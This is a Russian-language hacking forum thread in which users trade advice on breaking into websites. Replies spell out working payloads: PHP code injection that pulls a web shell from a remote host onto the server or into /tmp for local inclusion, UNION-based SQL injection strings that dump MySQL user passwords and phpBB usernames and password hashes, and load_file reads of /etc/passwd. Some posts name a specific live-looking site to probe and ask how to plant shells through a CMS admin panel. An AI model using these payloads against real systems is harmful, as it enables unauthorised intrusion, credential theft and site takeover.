Ваши вопросы по уязвимостям.

Здравствуйте! Я тут новичок и хотел бы спросить. Есть же хостинги, и у них хостятся сайты. Почему при взломе одного из этих сайтов (wso шелл) я могу видеть другие сайты и изменять их файлы, и всегда ли это????

ответьте пожалуйста прошу

 

radikal, не всегда. Если хостер лол и нет защиты со смежными сайтами, то получив доступ к одному сайту, автоматически получаешь ко всем остальным

 

Ответьте плз.

 

При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?

 

id=include("http://yoursite.com/yourfile");

id=copy($_GET[file1],$_GET[file2]);&file1=http://yoursite.com/yourfile.txt&file2=/yourpath/to/webfolder/

например

file1=http://microsoft.com/shell.txt&file2=/var/www/html/shell.php

если не знаешь полный путь к сайту to копируй шелл в папку /tmp

потом делай локальный инклуд
include("/tmp/shell.php");

 

Есть SQL inj.
Перебрал все таблицы и колонки, но не могу вывести информацию из этих таблиц.
5 ветка.
1,2,3,4,5,passwords,7+from+site_users--
Надо как бэ указать юзера БД, чтобы вывести информацию? Но как это сделать?

 

1,2,3,4,5,schema_name,7+from+information_schema.schemata--

 

ок, ну как вывести password указв при этом юзверя БД?

 

select+1,2,3,4,5,password,7+from+mysql.user+where+user='имя юзера'

 

т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129

 

А, сори не так понял, я думал тебе надо юзера, под которым работает БД )
Если нужно вывести пароль нужного пользователя из таблицы phpbb_users, то вот так
select+1,2,3,4,5,concat_ws(0x3a,username,user_password),7+from+phpbb_users+where+username='имя юзера'
и подставь свои значения колонок, по дефолту для phpbb, как мне помниться это username и user_password

 

Первый раз ты правильно понял
мне как раз вот это и нужно

Просто помоги составить запрос с теми данными

 

Тогда select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
например select+1,2,3,4,5,password,7+from+mysql.user+where+ user='root'
Либо select+1,2,3,4,5,concat_ws(0x3a,user,password),7+from+mysql.user+limit+1,1 и перебирай limit'ом

 

pervoe posmotri u tebya kakie bd (schema_name)
select+1,2,3,4,5,schema_name,7+from+information_schema.schemata
a potom posmotri table_name=>phpBB_users v kakoy bd ? naprimer imya bd test..i zapros budet..
select+1,2,3,4,5,password,7+from+phpbb_users.test

 

2LokbatanLi,

Code:

+from+test.phpbb_users

, т.е. "имя БД.Таблица"

 

Здесь есть инклуд?

http://agrovisual.com/index.php?action=av_show_image'&id=1104

 

Опять 125, ошибка не значит инклюд, это просто немогут странички ошибки загрузиться.

// Где ваша хакерская догадка люди?

// Я читал этот топик ровно неделю, я стал седым.

 

Есть доступ к админке CMS WebAsyst

Есть способы как залить шелл?

 

хей!

если "load_file('/etc/passwd') нельзя, а load_file(0x2f6574632f706173737764) можно, то записать всё равно не получится?

 

Да, меджик квотес